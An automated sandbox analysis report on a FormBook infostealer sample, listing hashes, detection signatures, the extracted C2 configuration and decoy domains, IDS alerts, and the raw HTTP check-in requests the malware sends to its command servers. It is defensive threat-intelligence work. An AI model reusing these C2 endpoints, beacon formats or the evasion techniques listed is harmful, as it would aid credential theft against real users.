Analysis Report 08917506_by_Libranalysis

Overview

General Information

Sample Name: 08917506_by_Libranalysis (renamed file extension from none to exe)
Analysis ID: 403903
MD5: 089175069d5c095f078b7f8a3b28a22d
SHA1: a563615dfe562e7a11c2b7f21dcfcd412594eeee
SHA256: 173797a7a7a881f3d6230015620bae28d21b4b41b7e568c2a881b3c0829dd67e
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.evrbrite.com/o86d/"], "decoy": ["marielivet.com", "shadowlovely.com", "novfarm.com", "genialnetero.com", "nj-yanhua.com", "thaihuay88.com", "iizponja.com", "stark-stg.net", "nueforma.com", "fincheckxu.com", "joycasino-2020.club", "9thwrld.com", "komofood.com", "weekendcost.com", "marczeimet.com", "santequebec.info", "arpinaindustriesllc.com", "soyakmuzayede.com", "trivesse.online", "shonanwakukengyou.com", "whatisleanmanagement.com", "9icem.com", "blueberry-intl.com", "mylifequotenow.com", "octafxmate.com", "garnogroup.com", "saurara.com", "mydreamtv.net", "1fhewm.com", "agungproduk.com", "be7tv.com", "ohyescart.com", "sherylabrahamphotography.com", "oxfordfinancialadvising.com", "xn--80aaf2ckffc3a.xn--p1acf", "firstcoastelope.com", "novaquitaine-solidaire.com", "morumi.site", "lr-tn.com", "avondalevotes.com", "saranaturals.net", "thebraidedbreadcompany.com", "recruit-japan-hcm.com", "innovate.works", "changfangxinxi.com", "ckitco.com", "lacommusic.net", "cibass.com", "cafeciberseguridad.com", "fittogo.net", "franciszekmanteau.com", "liquidmarin.com", "toky5555.xyz", "bloomberg.sucks", "bluejay.ventures", "valleywomanforwoman.com", "helmutbuntjer.com", "870830.com", "xmrxapp.com", "lashicorn.com", "visionsbarbershop.com", "cinmax.xyz", "website-bazar.com", "zenseotools.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\OfCxSfBf.exe ReversingLabs: Detection: 17%
Multi AV Scanner detection for submitted file
Source: 08917506_by_Libranalysis.exe Virustotal: Detection: 23% Perma Link
Source: 08917506_by_Libranalysis.exe ReversingLabs: Detection: 17%
Yara detected FormBook
Source: Yara match File source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\OfCxSfBf.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 08917506_by_Libranalysis.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: 08917506_by_Libranalysis.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll Jump to behavior
Source: 08917506_by_Libranalysis.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ipconfig.pdb source: 08917506_by_Libranalysis.exe, 00000005.00000002.295591762.0000000003150000.00000040.00000001.sdmp
Source: Binary string: ipconfig.pdbGCTL source: 08917506_by_Libranalysis.exe, 00000005.00000002.295591762.0000000003150000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: 08917506_by_Libranalysis.exe, 00000005.00000002.295139182.0000000001550000.00000040.00000001.sdmp, ipconfig.exe, 0000000F.00000002.495544603.0000000000D30000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: 08917506_by_Libranalysis.exe, ipconfig.exe
Source: Binary string: mscorrc.pdb source: 08917506_by_Libranalysis.exe, 00000000.00000002.260684849.0000000009280000.00000002.00000001.sdmp

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 4x nop then mov esp, ebp 0_2_05818E80
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Code function: 4x nop then mov esp, ebp 0_2_05818E73

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49734 -> 67.222.39.83:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49734 -> 67.222.39.83:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49734 -> 67.222.39.83:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 206.189.46.186:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 206.189.46.186:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 206.189.46.186:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49749 -> 192.0.78.24:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49749 -> 192.0.78.24:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49749 -> 192.0.78.24:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49752 -> 162.0.232.119:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49752 -> 162.0.232.119:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49752 -> 162.0.232.119:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.evrbrite.com/o86d/
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.cinmax.xyz
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=FLq1m09lMNVeUGxb2EGlpEcYOBglVjP6VclDGdRBVwR1mwk4Bp+oxJyzVgRWjmk7leVMWGvpeQ==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.cinmax.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=ciPSY9IHIiBMUeM+AHa6rnkVhX0NcoOlsc17DR+fEw9UxF+XyC1njkrt1st9cFa0q3XsiD0AOg==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.genialnetero.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=sTrQNZETbqohgMY0G3QDWOyfMZqAyHA57kuO1l/GbTBT7+5tNjLfMqbR0u4OJ3a+5b59BonIRA==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.joycasino-2020.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=PL9u7p4v7hn5T83wCAG42BUGAPPNW4v8+s1TFKrmIVkrOUDjB/r4wvcv+gOAAG+Oa4qYtq3B7Q==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.marielivet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=LOco70LpFY5umcR4dQY6Ck5isx6bsPxuRuPfG/JQuVwPWdFiKckkP6tLRm3hZqsbjizE9R3VWg==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.firstcoastelope.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=lH+NNz2eaU5LSk/yemMXIWDwl3fMAuCKISb0DcDmH6anXfUVh7p155egYD4l1a4C4v8/cW+zhg==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.blueberry-intl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=Zr1mHD0UzvWCQcI2JlGAeokzkFEIblHMxqeZtw3W9dCQQ7exnTCb8lR/2qgknbIFYyB/eFrcFw==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.thaihuay88.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=Zt5QD3TUSOnCkU7SKGg3ywaITg6vE6njEzv/4k+L08OvZwr0NYVY1MAp4q6WCjDapjCg57Vf4Q==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.website-bazar.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=VzK2bv7yp5iwEBdNZQjCdXXbrLCot30MtbV4orBq8x4MF4HvmT9bEqgnu31MbrCbNdKakV5eJA==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.sherylabrahamphotography.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 192.0.78.24 192.0.78.24
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL ON-LINE-DATAServerlocation-NetherlandsDrontenNL
Source: Joe Sandbox View ASN Name: AUTOMATTICUS AUTOMATTICUS
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=FLq1m09lMNVeUGxb2EGlpEcYOBglVjP6VclDGdRBVwR1mwk4Bp+oxJyzVgRWjmk7leVMWGvpeQ==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.cinmax.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=ciPSY9IHIiBMUeM+AHa6rnkVhX0NcoOlsc17DR+fEw9UxF+XyC1njkrt1st9cFa0q3XsiD0AOg==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.genialnetero.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=sTrQNZETbqohgMY0G3QDWOyfMZqAyHA57kuO1l/GbTBT7+5tNjLfMqbR0u4OJ3a+5b59BonIRA==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.joycasino-2020.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=PL9u7p4v7hn5T83wCAG42BUGAPPNW4v8+s1TFKrmIVkrOUDjB/r4wvcv+gOAAG+Oa4qYtq3B7Q==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.marielivet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=LOco70LpFY5umcR4dQY6Ck5isx6bsPxuRuPfG/JQuVwPWdFiKckkP6tLRm3hZqsbjizE9R3VWg==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.firstcoastelope.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=lH+NNz2eaU5LSk/yemMXIWDwl3fMAuCKISb0DcDmH6anXfUVh7p155egYD4l1a4C4v8/cW+zhg==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.blueberry-intl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=Zr1mHD0UzvWCQcI2JlGAeokzkFEIblHMxqeZtw3W9dCQQ7exnTCb8lR/2qgknbIFYyB/eFrcFw==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.thaihuay88.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=Zt5QD3TUSOnCkU7SKGg3ywaITg6vE6njEzv/4k+L08OvZwr0NYVY1MAp4q6WCjDapjCg57Vf4Q==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.website-bazar.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /o86d/?W6jDfD=VzK2bv7yp5iwEBdNZQjCdXXbrLCot30MtbV4orBq8x4MF4HvmT9bEqgnu31MbrCbNdKakV5eJA==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.sherylabrahamphotography.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.cinmax.xyz
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 May 2021 12:07:24 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 328Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6f 38 36 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /o86d/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000007.00000000.272184398.0000000006840000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.com
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230294482.0000000005BC1000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comde
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: 08917506_by_Libranalysis.exe String found in binary or memory: http://www.churchsw.org/church-projector-project
Source: 08917506_by_Libranalysis.exe String found in binary or memory: http://www.churchsw.org/repository/Bibles/
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253501338.0000000005BB0000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comaa
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253501338.0000000005BB0000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comceco
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.229924216.0000000005BC8000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.249681781.0000000001AA7000.00000004.00000040.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmp
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230603893.0000000005BB9000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/2
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/;
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230826809.0000000005BB6000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/H
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230603893.0000000005BB9000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/M
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/W
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230826809.0000000005BB6000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0r:
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230826809.0000000005BB6000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/_
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/a
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230826809.0000000005BB6000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/)
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/2
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/M
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/p
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/s
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/x
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230287588.0000000005BCB000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.comic
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230287588.0000000005BCB000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.comlic
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230081674.0000000005BC4000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cna
Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: ipconfig.exe, 0000000F.00000002.499188275.0000000003712000.00000004.00000001.sdmp String found in binary or memory: https://www.sherylabrahamphotography.com/o86d/?W6jDfD=VzK2bv7yp5iwEBdNZQjCdXXbrLCot30MtbV4orBq8x4MF4
Source: ipconfig.exe, 0000000F.00000002.499188275.0000000003712000.00000004.00000001.sdmp String found in binary or memory: https://www.website-bazar.com/o86d/?W6jDfD=Zt5QD3TUSOnCkU7SKGg3ywaITg6vE6njEzv/4k

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
